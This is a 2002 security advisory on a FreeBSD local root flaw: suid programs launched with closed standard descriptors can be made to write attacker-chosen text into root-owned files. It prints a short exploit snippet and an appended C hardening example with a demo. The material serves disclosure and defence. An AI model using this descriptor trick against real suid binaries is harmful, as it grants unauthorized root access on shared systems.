-----------------------------------------------------------------------------
Pine Internet Security Advisory
-----------------------------------------------------------------------------
Advisory ID     : PINE-CERT-20020401
Authors         : Joost Pol <[EMAIL PROTECTED]>
Issue date      : 2002-04-22
Application     : Multiple
Version(s)      : Multiple
Platforms       : FreeBSD confirmed, maybe others.
Vendor informed : 20020406
Availability    : http://www.pine.nl/advisories/pine-cert-20020401.txt
-----------------------------------------------------------------------------
Synopsis

It is possible for a local user to execute a suid application with stdin,
stdout or stderr closed.

Impact

HIGH. Local users should be able to gain root privileges.

Description

Consider the following (imaginary) suid application:

-- begin of imaginary code snippet
FILE * f = fopen("/etc/root_owned_file", "r+");
if(f) {
    fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);
    fclose(f);
}
-- end of imaginary code snippet

Now, consider the following (imaginary) exploit:

-- begin of imaginary exploit snippet
while(dup(1) != -1);   /* fill the descriptor table with copies of stdout */
close(2);              /* leave descriptor 2 as the only free slot */
execl("/path/to/suid_application", "this text will endup in the root_owned_file", 0);
-- end of imaginary exploit snippet

Because open(2) hands out the lowest free descriptor, the fopen() in the suid
application receives descriptor 2 once stderr is closed, and its fprintf() to
stderr writes argv[0] into the root-owned file.

Exploitation has been confirmed using the S/KEY binaries.

Solution

FreeBSD source trees have been updated on the 21st of April 2002. Please cvsup.
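The descriptor reuse above, and the usual defence against it, as an added C example that is not code from the advisory or from FreeBSD: sanitize_std_fds() reopens any closed standard descriptor on /dev/null, which is what a setuid program should do before its first open(), and run_with_stderr_closed() replays the advisory's scenario in a child process with and without that step. The file path and the diagnostic text are constructed for the demo.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Make sure descriptors 0, 1 and 2 are open, pointing any closed one at
 * /dev/null. Returns how many were reopened, or -1 on an unexpected fd. */
int sanitize_std_fds(void) {
    int reopened = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1 || errno != EBADF)
            continue;                     /* already open */
        /* open(2) returns the lowest free descriptor, which is fd here
         * because 0..fd-1 have just been verified open. */
        if (open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY) != fd)
            return -1;
        reopened++;
    }
    return reopened;
}

/* Re-enact the advisory in a child: close stderr as the exploit does,
 * optionally harden, then open a file and print a diagnostic to stderr
 * like the vulnerable program. Returns the fd the file got (2 = bug live). */
int run_with_stderr_closed(const char *path, int hardened) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        sanitize_std_fds();               /* known state: 0, 1, 2 open */
        close(2);
        if (hardened && sanitize_std_fds() < 0) _exit(255);
        int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        fprintf(stderr, "suid: fopen() succeeded\n"); /* goes to fd 2 */
        _exit(fd < 0 ? 254 : fd);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Return 1 if the file at path contains needle, else 0. */
int file_contains(const char *path, const char *needle) {
    char buf[256] = {0};
    int fd = open(path, O_RDONLY);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    if (fd >= 0) close(fd);
    return n > 0 && strstr(buf, needle) != NULL;
}
```

Without the hardening the diagnostic ends up inside the opened file; with it, the file stays empty because descriptor 2 is already taken by /dev/null.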